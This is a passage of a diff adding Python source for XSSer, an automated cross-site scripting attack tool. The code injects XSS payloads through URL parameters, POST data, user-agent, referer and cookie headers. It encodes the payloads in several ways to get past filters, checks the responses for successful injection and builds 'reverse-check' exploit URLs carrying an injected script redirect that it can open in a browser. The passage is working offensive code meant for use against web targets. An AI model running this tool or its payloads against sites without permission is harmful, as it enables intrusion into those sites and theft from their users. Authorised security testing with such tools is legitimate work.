+                        print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n"
+                        print "- Your target " + "(" + url + ")" + " looks that is NOT alive"
+                        print "- If you are receiving continuous 404 errors requests on payloads\n  and this HEAD pre-check request is giving you another 404\n  maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n"
+                self.errors_isalive = 0
+            else:
+                if str(self.errors_isalive) >= str(self.options.isalive):
+                    self.report("---------------------")
+                    self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
+                    self.next_isalive = True
+                    self.options.isalive = self.flag_isalive_num
+        else:
+            if self.options.isalive and self.options.nohead:
+                self.report("---------------------")
+                self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
+                self.report("---------------------")
+        # check results an alternative url, choosing method and parameters, or not
+        if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
+            self.options.altm = "GET"
+        if self.options.altm == "post":
+            self.options.altm = "POST"
+        if self.options.alt == None:
+            pass
+        else:
+            self.report("="*45)
+            self.report("[+] Checking Response Options:", "\n")
+            self.report("[+] Url:", self.options.alt)
+            self.report("[-] Method:", self.options.altm)
+            if self.options.ald:
+                self.report("[-] Parameter(s):", self.options.ald, "\n")
+            else:
+                self.report("[-] Parameter(s):", query_string, "\n")
+        if c.info()["http-code"] in ["200", "302", "301"]:
+            if self.options.statistics:
+                self.success_connection = self.success_connection + 1
+            self._report_attack_success(c, dest_url, payload,
+                                        query_string, url)
+        else:
+            self._report_attack_failure(c, dest_url, payload,
+                                        query_string, url)
+        # checking response results 
+        if self.options.alt == None:
+            pass
+        else:
+            self.report("="*45)
+            self.report("[+] Checking Response Results:", "\n")
+            self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
+            if 'PAYLOAD' in payload['payload']:
+                user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
+            if self.options.ald:
+                query_string = self.options.ald
+            if "VECTOR" in self.options.alt:
+                dest_url = self.options.alt
+            else:
+                if not dest_url.endswith("/"):
+                    dest_url = dest_url + "/"
+            if self.options.altm == 'POST':
+                dest_url = "" + query_string + user_attack_payload
+                dest_url = dest_url.strip().replace("/", "", 1)
+                data = c.post(url, dest_url)
+            else:
+                dest_url = self.options.alt + query_string + user_attack_payload
+                c.get(dest_url)
+            # perform check response injection
+            if c.info()["http-code"] in ["200", "302", "301"]:
+                if self.options.statistics:
+                    self.success_connection = self.success_connection + 1
+                self._report_attack_success(c, dest_url, payload,
+                                            query_string, url)
+            else:
+                self._report_attack_failure(c, dest_url, payload,
+                                            query_string, url)
+        c.close()
+        del c
+
+    def encoding_permutations(self, enpayload_url):
+        """
+        perform encoding permutations on the url and query_string.
+        """
+        options = self.options
+        if options.Cem: 
+            enc_perm = options.Cem.split(",")
+            for _enc in enc_perm:
+                enpayload_url = self.encmap[_enc](enpayload_url)
+        else: 
+            for enctype in self.encmap.keys():
+                if getattr(options, enctype):
+                    enpayload_url = self.encmap[enctype](enpayload_url)
+        return enpayload_url
+
+    def _report_attack_success(self, curl_handle, dest_url, payload,\
+                               query_string, orig_url):
+        """
+        report connection success of an attack
+        """
+        if not orig_url in self.successful_urls:
+            self.successful_urls.append(orig_url)
+        options = self.options
+        current_hashes = [] # to check for ongoing hashes
+        if payload['browser'] == "[Heuristic test]":
+            for key, value in self.hashed_injections.iteritems():
+                if str(key) in dest_url:
+                    if key not in current_hashes:
+                        self.final_hashes[key] = value
+                        current_hashes.append(key)
+        elif self.options.hash:
+            for key, value in self.hashed_injections.iteritems():
+                self.final_hashes[key] = value
+                current_hashes.append(key)
+        else:
+            self.report("-"*45)
+            self.report("\n[!] Hashing: \n")
+            for key, value in self.hashed_injections.iteritems():
+                if str(key) in dest_url:
+                    if key not in current_hashes:
+                        self.report(" [ " +key+" ] : [" , value + " ]")
+                        self.final_hashes[key] = value
+                        current_hashes.append(key)
+                else:
+                    if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
+                        b64_string = payload["payload"].split("[B64]")
+                        b64_string = b64_string[1]
+                        b64_string = b64_string.replace('PAYLOAD', key)
+                        b64_string = b64encode(b64_string)
+                        b64_string = urllib.urlencode({'':b64_string})
+                        if b64_string.startswith("="):
+                            b64_string = b64_string.replace("=", "")
+                        if str(b64_string) in str(dest_url):
+                            if key not in current_hashes:
+                                self.report(" [ " +key+" ] : [" , value + " ]")
+                                self.final_hashes[key] = value
+                                current_hashes.append(key)
+                    else: # when using encoders (Str, Hex, Dec...)
+                        payload_string = payload["payload"].replace("PAYLOAD", key)
+                        hashed_payload = self.encoding_permutations(payload_string)
+                        if self.options.Cem:
+                            enc_perm = options.Cem.split(",")
+                            for e in enc_perm:
+                                hashed_payload = self.encoding_permutations(payload_string)
+                                if e == "Str":
+                                    hashed_payload = hashed_payload.replace(",", "%2C")
+                                if e == "Mix":
+                                    hashed_payload=urllib.quote(hashed_payload)
+                                if e == "Dec":
+                                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                if e == "Hex":
+                                    hashed_payload = hashed_payload.replace("%", "%25")
+                                if e == "Hes":
+                                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                    hashed_payload = hashed_payload.replace(";", "%3B")
+                        else:
+                            if self.options.Str:
+                                hashed_payload = hashed_payload.replace(",", "%2C")
+                            if self.options.Mix:
+                                hashed_payload=urllib.quote(hashed_payload)
+                            if self.options.Dec:
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                            if self.options.Hex:
+                                hashed_payload = hashed_payload.replace("%", "%25")
+                            if self.options.Hes:
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                hashed_payload = hashed_payload.replace(";", "%3B")
+                        if str(hashed_payload) in str(dest_url):
+                            if key not in current_hashes:
+                                self.report(" [ " +key+" ] : [" , value + " ]")
+                                self.final_hashes[key] = value
+            if self.extra_hashed_injections:
+                for k, v in self.extra_hashed_injections.iteritems():
+                    payload_url = str(v[1])
+                    if payload_url == payload["payload"]:
+                        if k not in current_hashes:
+                            self.report(" [ " +k+" ] : [" , v[0] + " ]")
+                            self.final_hashes[k] = v[0]
+                            current_hashes.append(k)
+            self.report("\n"+"-"*45+"\n")
+        if payload['browser'] == "[Heuristic test]":
+            self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
+        else:
+            if self.extra_hashed_injections:
+                extra_attacks=[]
+                if options.xsa:
+                    extra_attacks.append("XSA")
+                if options.xsr:
+                    extra_attacks.append("XSR")
+                if options.coo:
+                    extra_attacks.append("COO")
+                if extra_attacks:
+                    extra_attacks = "+ "+ str(extra_attacks)
+                if options.postdata:
+                    self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
+                else:
+                    self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
+            else:
+                if options.postdata:
+                    self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
+                else:
+                    self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
+            if not self.options.hash and not self.options.script:
+                if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
+                    pass
+                else:
+                    self.report("-"*45)
+        if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
+            pass
+        else:
+            if not "XSS" in dest_url or not "X1S" in dest_url:
+                if self.options.xsa or self.options.xsr or self.options.coo:
+                    pass
+                else:
+                    self.report("-"*45)
+                    self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
+                    if not self.options.verbose:
+                        self.report("-"*45 + "\n")
+            else:
+                self.report("-"*45)
+                self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
+                if not self.options.verbose:
+                    self.report("-"*45 + "\n")
+	    # statistics injections counters
+        if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
+            self.check_positives = self.check_positives + 1
+        elif payload['browser']=="[Data Control Protocol Injection]":
+            self.dcp_injection = self.dcp_injection + 1
+        elif payload['browser']=="[Document Object Model Injection]":
+            self.dom_injection = self.dom_injection + 1
+        elif payload['browser']=="[Induced Injection]":
+            self.httpsr_injection = self.httpsr_injection + 1
+        elif payload['browser']=="[manual_injection]":
+            self.manual_injection = self.manual_injection + 1
+        else:
+            self.auto_injection = self.auto_injection +1
+        if not self.hashed_injections:
+            for k, v in self.extra_hashed_injections.iteritems():
+                if k in current_hashes:
+                    if v[0] == "XSA":
+                        agent = v[1]
+                        agent = agent.replace("PAYLOAD", k)
+                        Curl.agent = agent
+                    if v[0] == "XSR":
+                        referer = v[1]
+                        referer = referer.replace("PAYLOAD", k)
+                        Curl.referer = referer
+                    if v[0] == "COO":
+                        cookie = v[1]
+                        cookie = cookie.replace("PAYLOAD", k)
+                        Curl.cookie = cookie
+        else:
+            for key, value in self.hashed_injections.iteritems():
+                for k, v in self.extra_hashed_injections.iteritems():
+                    payload_url = v[1]
+                    payload_url = payload_url.replace("PAYLOAD",key)
+                    payload_url = payload_url.replace(" ", "+") # black magic!
+                    final_dest_url = str(urllib.unquote(dest_url.strip()))
+                    if payload_url in final_dest_url:
+                        if v[0] == "XSA":
+                            agent = v[1]
+                            agent = agent.replace("PAYLOAD", k)
+                            Curl.agent = agent
+                        if v[0] == "XSR":
+                            referer = v[1]
+                            referer = referer.replace("PAYLOAD", k)
+                            Curl.referer = referer
+                        if v[0] == "COO":
+                            cookie = v[1]
+                            cookie = cookie.replace("PAYLOAD", k)
+                            Curl.cookie = cookie
+                    else:
+                        if k in current_hashes:
+                            if v[0] == "XSA":
+                                agent = v[1]
+                                agent = agent.replace("PAYLOAD", k)
+                                Curl.agent = agent
+                            if v[0] == "XSR":
+                                referer = v[1]
+                                referer = referer.replace("PAYLOAD", k)
+                                Curl.referer = referer
+                            if v[0] == "COO":
+                                cookie = v[1]
+                                cookie = cookie.replace("PAYLOAD", k)
+                                Curl.cookie = cookie
+        if options.verbose:
+            self.report("-"*45)
+            self.report("\n[+] HTTP Headers Verbose:\n")
+            self.report(" [Client Request]")
+            Curl.print_options()
+            self.report(" [Server Reply]\n")
+            self.report(curl_handle.info())
+        self.report("="*45)
+        self.report("[*] Injection(s) Results:")
+        self.report("="*45 + "\n")
+        if payload['browser']=="[Heuristic test]":
+            for key, value in self.final_hashes.iteritems():
+                if str(key) in dest_url:
+                    heuristic_string = key
+                    heuristic_param = str(payload['payload']).strip('XSS')
+                    # checking heuristic responses
+                    if heuristic_string in curl_handle.body():
+                        # ascii
+                        if heuristic_param == "\\":
+                            self.heuris_backslash_found = self.heuris_backslash_found + 1
+                        # / same as ASCII and Unicode
+                        elif heuristic_param == "/":
+                            self.heuris_slash_found = self.heuris_slash_found + 1
+                            self.heuris_une_slash_found = self.heuris_une_slash_found + 1
+                        elif heuristic_param == ">":
+                            self.heuris_mayor_found = self.heuris_mayor_found + 1
+                        elif heuristic_param == "<":
+                            self.heuris_minor_found = self.heuris_minor_found + 1
+                        elif heuristic_param == ";":
+                            self.heuris_semicolon_found = self.heuris_semicolon_found + 1
+                        elif heuristic_param == "'":
+                            self.heuris_colon_found = self.heuris_colon_found + 1
+                        elif heuristic_param == '"':
+                            self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
+                        elif heuristic_param == "=":
+                            self.heuris_equal_found = self.heuris_equal_found + 1
+                        # une
+                        elif heuristic_param == "%5C":
+                            self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
+                        elif heuristic_param == "%3E":
+                            self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
+                        elif heuristic_param == "%3C":
+                            self.heuris_une_minor_found = self.heuris_une_minor_found + 1
+                        elif heuristic_param == "%3B":
+                            self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
+                        elif heuristic_param == "%27":
+                            self.heuris_une_colon_found = self.heuris_une_colon_found + 1
+                        elif heuristic_param == "%22":
+                            self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
+                        elif heuristic_param == "%3D":
+                            self.heuris_une_equal_found = self.heuris_une_equal_found + 1
+                        # dec
+                        elif heuristic_param == "&#92":
+                            self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
+                        elif heuristic_param == "&#47":
+                            self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
+                        elif heuristic_param == "&#62":
+                            self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
+                        elif heuristic_param == "&#60":
+                            self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
+                        elif heuristic_param == "&#59":
+                            self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
+                        elif heuristic_param == "&#39":
+                            self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
+                        elif heuristic_param == "&#34":
+                            self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
+                        elif heuristic_param == "&#61":
+                            self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
+                        self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
+                    else:
+                        if heuristic_param == "\\":
+                            self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
+                        elif heuristic_param == "/":
+                            self.heuris_slash_notfound = self.heuris_slash_notfound + 1
+                        elif heuristic_param == ">":
+                            self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
+                        elif heuristic_param == "<":
+                            self.heuris_minor_notfound = self.heuris_minor_notfound + 1
+                        elif heuristic_param == ";":
+                            self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
+                        elif heuristic_param == "'":
+                            self.heuris_colon_notfound = self.heuris_colon_notfound + 1
+                        elif heuristic_param == '"':
+                            self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
+                        elif heuristic_param == "=":
+                            self.heuris_equal_notfound = self.heuris_equal_notfound + 1
+                        self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
+        elif self.options.hash:
+            for key, value in self.final_hashes.iteritems():
+                if str(key) in dest_url:
+                    if key in curl_handle.body():
+                        self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
+                    else:
+                        self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
+        else:
+            for key, value in self.final_hashes.iteritems(): 
+                if key in current_hashes:
+                    if "XSA" in value:
+                        method = "XSA"
+                        hashing = key
+                    elif "XSR" in value:
+                        method = "XSR"
+                        hashing = key
+                    elif "COO" in value:
+                        method = "COO"
+                        hashing = key
+                    else:
+                        method = value
+                        hashing = key
+                    if not hashing:
+                        pass
+                    else:
+                        if hashing not in dest_url:
+                            if key in current_hashes:
+                                if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
+                                    b64_string = payload["payload"].split("[B64]")
+                                    b64_string = b64_string[1]
+                                    b64_string = b64_string.replace('PAYLOAD', key)
+                                    b64_string = b64encode(b64_string)
+                                    b64_string = urllib.urlencode({'':b64_string})
+                                    if b64_string.startswith("="):
+                                        b64_string = b64_string.replace("=", "")
+                                    if str(b64_string) in str(dest_url):
+                                        self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
+                                else:
+                                    self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
+                        else:
+                            self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
+        self.report("")
+
+    def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
+        options = self.options
+        c_info = str(curl_handle.info())
+        c_body = str(curl_handle.body())
+        if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
+            b64_string = payload["payload"].split("[B64]")
+            b64_string = b64_string[1]
+            b64_string = b64_string.replace('PAYLOAD', hashing)
+            b64_string = b64encode(b64_string)
+            if b64_string.startswith("="):
+                b64_string = b64_string.replace("=", "")
+            hashing = b64_string
+        if str(hashing) in c_body and "http-code: 200" in c_info: # only add a success if hashing is on body and we have HTTP 200-OK [XSS CHECKPOINT!]
+            # some anti false positives checkers
+            if str(options.discode) in curl_handle.body(): # provided by user
+                self.report("[Info] Reply contains code [ --discode ] provided to be discarded... forcing failure!\n")
+                self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
+            else:
+                if str('/&gt;' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
+                    self.report("[Info] Reply looks like a -false positive- from here. Check it, manually... forcing discard!\n")
+                    self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
+                else:
+                    if options.discode:
+                        self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded... adding! ;-)\n")
+                    self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!       
+        else:
+            self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
+
+    def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
+        """
+        Add an attack that failed to inject
+        """
+        if method == "heuristic":
+            self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
+            self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
+        elif method == "hashing check":
+            self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]")
+            self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
+        else:
+            self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]")
+            self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
+          
+    def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
+        """
+        Add an attack that managed to inject the code
+        """
+        if method == "heuristic":
+            self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
+            self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
+        elif method == "hashing check":
+            self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
+            self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
+        else:
+            payload_sub =  payload['payload']
+            self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]")
+            self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
+        for reporter in self._reporters:
+            reporter.add_success(dest_url)
+        if self.options.reversecheck:
+            if self.options.dcp or self.options.inducedcode or self.options.dom:
+                pass
+            else:
+                self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
+
+    def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
+        self.report("\n" + "="*50)
+        self.report("\n[Info] Trying [ --reverse-check ] from:\n\n"+ orig_url + query_string)
+        if "VECTOR" in orig_url:
+            dest_url = orig_url
+        else:
+            if not dest_url.endswith("/"):
+                dest_url = dest_url + "/"
+            dest_url = orig_url + query_string + payload['payload']
+
+        tok_url = None
+        self_url = "http://localhost:19084/success/" + hashing
+        shadow_js_inj = "document.location=document.location.hash.substring(1)"
+        shadow_inj = "<script>" + shadow_js_inj + "</script>"
+        shadow_js_inj = shadow_js_inj
+        dest_url = dest_url.split("#")[0]
+
+        def requote(what):
+            return urllib.quote_plus(what)
+        vector_and_payload = payload['payload']
+        _e = self.encoding_permutations
+        if 'XSS' in dest_url:
+            dest_url = dest_url.replace('XSS', vector_and_payload)
+        if 'X1S' in dest_url:
+            dest_url = dest_url.replace('XSS', vector_and_payload)
+        if 'VECTOR' in dest_url:
+            dest_url = dest_url.replace('VECTOR', vector_and_payload)
+        if '">PAYLOAD' in dest_url:
+            tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
+            tok_url += '#' + self_url
+        elif "'>PAYLOAD" in dest_url:
+            tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
+            tok_url += '#' + self_url
+        elif "javascript:PAYLOAD" in dest_url:
+            tok_url = dest_url.replace('javascript:PAYLOAD',
+                                       self.encoding_permutations("window.location='" + self_url+"';"))
+            tok_url = dest_url.replace("javascript:PAYLOAD",
+                                       _e("javascript:" + shadow_js_inj))
+            tok_url+= '#' + self_url
+        elif '"PAYLOAD"' in dest_url:
+            tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
+        elif "'PAYLOAD'" in dest_url:
+            tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
+        elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
+            tok_url = dest_url.replace('PAYLOAD', self_url)
+        elif "SCRIPT" in dest_url:
+            tok_url = dest_url.replace('PAYLOAD',
+                                      shadow_js_inj)
+            tok_url += '#' + self_url
+        elif 'onerror="PAYLOAD"' in dest_url:
+            tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
+            tok_url+= '#' + self_url
+        elif 'onerror="javascript:PAYLOAD"' in dest_url:
+            tok_url = dest_url.replace('javascript:PAYLOAD',
+            				self.encoding_permutations("window.location='" + self_url+"';"))
+            tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
+                                       _e('onerror="javascript:' + shadow_js_inj + '"'))
+            tok_url+= '#' + self_url
+        elif '<PAYLOAD>' in dest_url:
+            tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
+            tok_url+= '#' + self_url
+        elif 'PAYLOAD' in dest_url:
+            tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
+            tok_url+= '#' + self_url
+        elif 'href' in dest_url and 'PAYLOAD' in dest_url:
+            tok_url = dest_url.replace('PAYLOAD', self_url)
+        elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
+            tok_url = dest_url.replace('PAYLOAD', self_url)
+        elif 'url' in dest_url and 'PAYLOAD' in dest_url:
+            tok_url = dest_url.replace('PAYLOAD', self_url)
+        self.final_attacks[hashing] = {'url': tok_url}
+        if tok_url:
+            try:
+                if self.options.reverseopen:
+                    self.report("\n" + "-"*25+"\n")
+                    self.report("[Info] Launching web browser (default) with a 'token' url...")
+                    self._webbrowser.open(tok_url)
+            except:
+                pass
+
+    def _report_attack_failure(self, curl_handle, dest_url, payload,\
+                               query_string, orig_url):
+        """
+        report connection failure of an attack
+        """
+        options = self.options
+        current_hashes = [] # to check for ongoing hashes
+        if payload['browser'] == "[Heuristic test]":
+            for key, value in self.hashed_injections.iteritems():
+                if key not in current_hashes:
+                    self.final_hashes[key] = value
+                    current_hashes.append(key)
+        elif self.options.hash:
+            for key, value in self.hashed_injections.iteritems():
+                self.final_hashes[key] = value
+                current_hashes.append(key)
+        else:
+            self.report("-"*45)
+            self.report("\n[!] Hashing: \n")
+            for key, value in self.hashed_injections.iteritems():
+                if str(key) in str(dest_url): # GET
+                    if key not in current_hashes:
+                        self.report(" [ " +key+" ] : [" , value + " ]")
+                        self.final_hashes[key] = value
+                        current_hashes.append(key)
+                else:
+                    if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
+                        b64_string = payload["payload"].split("[B64]")
+                        b64_string = b64_string[1]
+                        b64_string = b64_string.replace('PAYLOAD', key)
+                        b64_string = b64encode(b64_string)
+                        b64_string = urllib.urlencode({'':b64_string})
+                        if b64_string.startswith("="):
+                            b64_string = b64_string.replace("=", "")
+                        if str(b64_string) in str(dest_url):
+                            if key not in current_hashes:
+                                self.report(" [ " +key+" ] : [" , value + " ]")
+                                self.final_hashes[key] = value
+                                current_hashes.append(key)
+                    else: # when using encoders (Str, Hex, Dec...)
+                        payload_string = payload["payload"].replace("PAYLOAD", key)
+                        hashed_payload = self.encoding_permutations(payload_string)
+                        if self.options.Cem:
+                            enc_perm = options.Cem.split(",")
+                            for e in enc_perm:
+                                hashed_payload = self.encoding_permutations(payload_string)
+                                if e == "Str":
+                                    hashed_payload = hashed_payload.replace(",", "%2C")
+                                if e == "Mix":
+                                    hashed_payload=urllib.quote(hashed_payload)
+                                if e == "Dec":
+                                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                if e == "Hex":
+                                    hashed_payload = hashed_payload.replace("%", "%25")
+                                if e == "Hes":
+                                    hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                    hashed_payload = hashed_payload.replace(";", "%3B")
+                        else:
+                            if self.options.Str:
+                                hashed_payload = hashed_payload.replace(",", "%2C")
+                            if self.options.Mix:
+                                hashed_payload=urllib.quote(hashed_payload)
+                            if self.options.Dec:
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                            if self.options.Hex:
+                                hashed_payload = hashed_payload.replace("%", "%25")
+                            if self.options.Hes:
+                                hashed_payload = hashed_payload.replace("&#", "%26%23")
+                                hashed_payload = hashed_payload.replace(";", "%3B")
+                        if str(hashed_payload) in str(dest_url): 
+                            if key not in current_hashes:
+                                self.report(" [ " +key+" ] : [" , value + " ]")
+                                self.final_hashes[key] = value
+                                current_hashes.append(key)
+            if self.extra_hashed_injections:
+                for k, v in self.extra_hashed_injections.iteritems():
+                    payload_url = str(v[1])
+                    if payload_url == payload["payload"]:
+                        if k not in current_hashes:
+                            self.report(" [ " +k+" ] : [" , v[0] + " ]")
+                            self.final_hashes[k] = v[0]
+                            current_hashes.append(k)
+            self.report("\n"+"-"*45+"\n")
+        if payload['browser'] == "[Heuristic test]":
+            self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
+        else:
+            if self.extra_hashed_injections:
+                extra_attacks=[]
+                if options.xsa:
+                    extra_attacks.append("XSA")
+                if options.xsr:
+                    extra_attacks.append("XSR")
+                if options.coo:
+                    extra_attacks.append("COO")
+                if extra_attacks:
+                    extra_attacks = "+ "+ str(extra_attacks)
+                if options.postdata:
+                    self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
+                else:
+                    self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
+            else:
+                if options.postdata:
+                    self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
+                else:
+                    self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
+            if not self.options.hash and not self.options.script:
+                if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
+                    pass
+                else:
+                    self.report("-"*45)
+        if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
+            pass
+        else:
+            if not "XSS" in dest_url or not "X1S" in dest_url:
+                if self.options.xsa or self.options.xsr or self.options.coo:
+                    pass
+                else:
+                    self.report("-"*45)
+                    self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
+                    if not self.options.verbose:
+                        self.report("-"*45 + "\n")
+            else:
+                self.report("-"*45)
+                self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
+                if not self.options.verbose:
+                    self.report("-"*45 + "\n")
+    	# statistics injections counters
+        if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
+            self.check_positives = self.check_positives + 1
+        elif payload['browser']=="[Data Control Protocol Injection]":
+            self.dcp_injection = self.dcp_injection + 1
+        elif payload['browser']=="[Document Object Model Injection]":
+            self.dom_injection = self.dom_injection + 1
+        elif payload['browser']=="[Induced Injection]":
+            self.httpsr_injection = self.httpsr_injection + 1
+        elif payload['browser']=="[manual_injection]":
+            self.manual_injection = self.manual_injection + 1
+        else:
+            self.auto_injection = self.auto_injection +1
+        if not self.hashed_injections:
+            for k, v in self.extra_hashed_injections.iteritems():
+                if k in current_hashes:
+                    if v[0] == "XSA":
+                        agent = v[1]
+                        agent = agent.replace("PAYLOAD", k)
+                        Curl.agent = agent
+                    if v[0] == "XSR":
+                        referer = v[1]
+                        referer = referer.replace("PAYLOAD", k)
+                        Curl.referer = referer
+                    if v[0] == "COO":
+                        cookie = v[1]
+                        cookie = cookie.replace("PAYLOAD", k)
+                        Curl.cookie = cookie
+        else:
+            for key, value in self.hashed_injections.iteritems():
+                for k, v in self.extra_hashed_injections.iteritems():
+                    payload_url = v[1]
+                    payload_url = payload_url.replace("PAYLOAD",key)
+                    payload_url = payload_url.replace(" ", "+") # black magic!
+                    final_dest_url = str(urllib.unquote(dest_url.strip()))
+                    if payload_url in final_dest_url:
+                        if v[0] == "XSA":
+                            agent = v[1]
+                            agent = agent.replace("PAYLOAD", k)
+                            Curl.agent = agent
+                        if v[0] == "XSR":
+                            referer = v[1]
+                            referer = referer.replace("PAYLOAD", k)
+                            Curl.referer = referer
+                        if v[0] == "COO":
+                            cookie = v[1]
+                            cookie = cookie.replace("PAYLOAD", k)
+                            Curl.cookie = cookie
+                    else:
+                        if k in current_hashes:
+                            if v[0] == "XSA":
+                                agent = v[1]
+                                agent = agent.replace("PAYLOAD", k)
+                                Curl.agent = agent
+                            if v[0] == "XSR":
+                                referer = v[1]
+                                referer = referer.replace("PAYLOAD", k)
+                                Curl.referer = referer
+                            if v[0] == "COO":
+                                cookie = v[1]
+                                cookie = cookie.replace("PAYLOAD", k)
+                                Curl.cookie = cookie
+        if options.verbose:
+            self.report("-"*45)
+            self.report("\n[+] HTTP Headers Verbose:\n")
+            self.report(" [Client Request]")
+            Curl.print_options()
+            self.report(" [Server Reply]\n")
+            self.report(curl_handle.info())
+        self.report("="*45)
+        self.report("[*] Injection(s) Results:")
+        self.report("="*45 + "\n")
+        if payload['browser']=="[Heuristic test]":
+            for key, value in self.final_hashes.iteritems():
+                if str(key) in dest_url:
+                    heuristic_string = key
+                    heuristic_param = str(payload['payload']).strip('XSS')
+                    if heuristic_param == "\\":
